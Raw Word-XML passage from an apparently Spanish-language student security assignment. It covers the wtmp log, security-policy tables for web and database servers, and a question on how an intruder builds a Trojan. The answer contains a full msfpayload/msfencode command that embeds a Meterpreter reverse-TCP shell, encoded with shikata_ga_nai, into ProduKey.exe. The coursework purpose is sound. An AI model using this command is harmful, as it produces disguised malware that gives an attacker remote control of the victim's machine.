          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conexión</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>desconexión</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> al sistema, para poder ver lo que contiene este archivo se debe usar el comando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last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, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ya que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cat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u otros no lo muestran.</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "https://www.ibiblio.org/pub/linux/docs/LuCaS/Manuales-LuCAS/SEGUNIX/unixsec-2.1-html/node90.html", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "wtmp", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=f857828c-e6da-35f7-99b5-364d665d53c0" ] } ], "mendeley" : { "formattedCitation" : "[3]", "plainTextFormattedCitation" : "[3]", "previouslyFormattedCitation" : "[3]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD7531" w:rsidRPr="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2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E765B2" w:rsidRDefault="00FF6D41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Se puede observar en la imagen que los datos que muestra son lo de inicio de la máquina, el usuario, la hora y la fecha de la conexión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2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E765B2" w:rsidRDefault="00FF6D41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s-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="6691630" cy="37719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65B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 acuerdo a la estructura de red planteada; establezca para cada caso, los cinco ítems más relevantes en la política de seguridad informática para protección de (En caso de requerir software para implementar la política, indique cual):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs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Servidor web.</w:t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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0"/>
        <w:tblW w:w="1028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49"/>
        <w:gridCol w:w="2838"/>
        <w:gridCol w:w="4701"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="120"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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  <w:jc w:val="center"/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8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  <w:jc w:val="center"/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4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  <w:jc w:val="center"/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Características del Hardware o Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="140"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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Control de acceso a los servidores.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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Dar diferentes privilegios a los usuarios dependiendo el rol o lo que necesite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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E765B2">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="160"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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Mecanismos de identificación y autenticación.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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Autenticación mediante contraseñas, huellas digitales, tarjetas, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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 xml:space="preserve">Tarjetas, lector de tarjetas, lector de huellas. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="120"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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 w:rsidP="004038AB">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Restringir el acceso a sitios no autorizados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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No permitir ingresar a sitios no autorizados ya que pueden afectar la seguridad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="120"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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CD7531" w:rsidP="004038AB">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Accesos diferentes a la raíz de apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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CD7531">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Al permitir que apache pueda acceder a directorios fuera de su raíz deja una brecha de seguridad   </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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CD7531">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="120"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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CD7531" w:rsidP="004038AB">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Seguridad en la red</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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CD7531">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">En este factor de seguridad </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>es muy importante ya que se busca garantizar que los datos que se reciben son los mismos que se están enviando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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CD7531">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Cifrados de extremo a extremo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs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Servidor de base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a1"/>
        <w:tblW w:w="1016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7"/>
        <w:gridCol w:w="2805"/>
        <w:gridCol w:w="4646"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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  <w:jc w:val="center"/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  <w:jc w:val="center"/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464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  <w:jc w:val="center"/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Características del Hardware o Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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Realizar copias de Seguridad Periódicamente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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  <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Cada cierto tiempo se debe realizar copias a las bases de datos de la organización.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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 xml:space="preserve">Sistema Gestor de Base de </w:t>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:t>Datos (</w:t>
            </w:r>
            <w:r w:rsidR="004F6D16">
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, Oracle, </w:t>
            </w:r>
            <w:r w:rsidR="004F6D16">
              <w:t>etc.</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="280"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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 xml:space="preserve">Sistemas UPS </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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Es imprescindible en la seguridad física ya que los equipos no responden a caídas repentinas y puede producirse pérdida de información.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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Sistema de alimentación ininterrumpida</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="220"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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 w:rsidP="004038AB">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_GoBack" w:colFirst="0" w:colLast="0"/>
            <w:r>
              <w:t>Control de usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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Los usuarios que pueden realizar cualquier tipo de CRUD a la base de datos deben estar administrados por el DBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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Sistema Gestor de Base de Datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="220"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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 w:rsidP="004038AB">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Cifrar información de las bases de datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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Transformar los datos sin proteger, en datos ilegibles usando una clave de cifrado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>SQL Server Compact 4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="220"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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 w:rsidP="004038AB">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SGBD </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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CD7531">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">La seguridad que se puede </w:t>
            </w:r>
            <w:r w:rsidR="004F6D16">
              <w:t>prestar por</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> la buena práctica de un SGBD con la creación de vistas, restricciones de vistas, </w:t>
            </w:r>
            <w:r w:rsidR="004F6D16">
              <w:t>disparadores. De</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> esta forma evitar que el desarrollador conozca el DER de la base de datos</w:t>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "https://html.rincondelvago.com/seguridad-en-bases-de-datos.html", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Encuentra aqu\u00ed informaci\u00f3n de Seguridad en bases de datos para tu escuela \u00a1Entra ya! | Rinc\u00f3n del Vago", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=7c076aee-558a-37cf-b6bd-27abca90858c" ] } ], "mendeley" : { "formattedCitation" : "[4]", "plainTextFormattedCitation" : "[4]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00864591" w:rsidRPr="00864591">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[4]</w:t>
            </w:r>
            <w:r w:rsidR="00864591">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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CD7531">
            <w:pPr>
              <w:contextualSpacing w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sistema Gestor de Base de Datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="8"/>
    </w:tbl>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3348355" cy="234188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34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65B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Responda lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:firstLine="720"/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E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="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a. Describa el proceso que usaría un intruso para crear un troyano basado en un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>payload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de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metasploit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:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="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Lo que haría un intruso para crear un troyano es usar la herramienta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msfpayload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que está incluida en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Metasploit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Framework </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">para inyectar un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Payload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  <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://www.reydes.com/d/?q=Crear_un_Troyano_utilizando_Metasploit_Framework", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Crear un Troyano utilizando Metasploit Framework | Alonso Caballero Quezada / ReYDeS", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=918d74b0-c0bf-3dee-a63d-a46561e90194" ] } ], "mendeley" : { "formattedCitation" : "[5]", "plainTextFormattedCitation" : "[5]", "previouslyFormattedCitation" : "[4]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00864591" w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="720"/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E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="0"/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Empezaria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usando el </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comando :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> LHOST=192.168.0.12 LPORT=443 R | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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msfencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -c 1 -t exe -x ./ProduKey.exe -o /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/ProduKey.exe</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD7531"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fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00864591"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instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://www.reydes.com/d/?q=Crear_un_Troyano_utilizando_Metasploit_Framework", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Crear un Troyano utilizando Metasploit Framework | Alonso Caballero Quezada / ReYDeS", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=918d74b0-c0bf-3dee-a63d-a46561e90194" ] } ], "mendeley" : { "formattedCitation" : "[5]", "plainTextFormattedCitation" : "[5]", "previouslyFormattedCitation" : "[4]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CD7531"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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00864591" w:rsidRPr="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531"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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing w:val="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El cual </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>esta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compuesto por LHOST que define la IP local y LPORT define el puerto local, el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfencode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-e es el codificador que se va a usar, -c es el número de veces que se codificaran los datos, -t define el formato de salida, -x especifica una plantilla ejecutable alterna, y -o define el archivo de salida.</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://www.reydes.com/d/?q=Crear_un_Troyano_utilizando_Metasploit_Framework", "accessed" : { "date-parts" : [ [ "2017", "12", "15" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Crear un Troyano utilizando Metasploit Framework | Alonso Caballero Quezada / ReYDeS", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=918d74b0-c0bf-3dee-a63d-a46561e90194" ] } ], "mendeley" : { "formattedCitation" : "[5]", "plainTextFormattedCitation" : "[5]", "previouslyFormattedCitation" : "[4]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00864591" w:rsidRPr="00864591">
        <w:rPr>
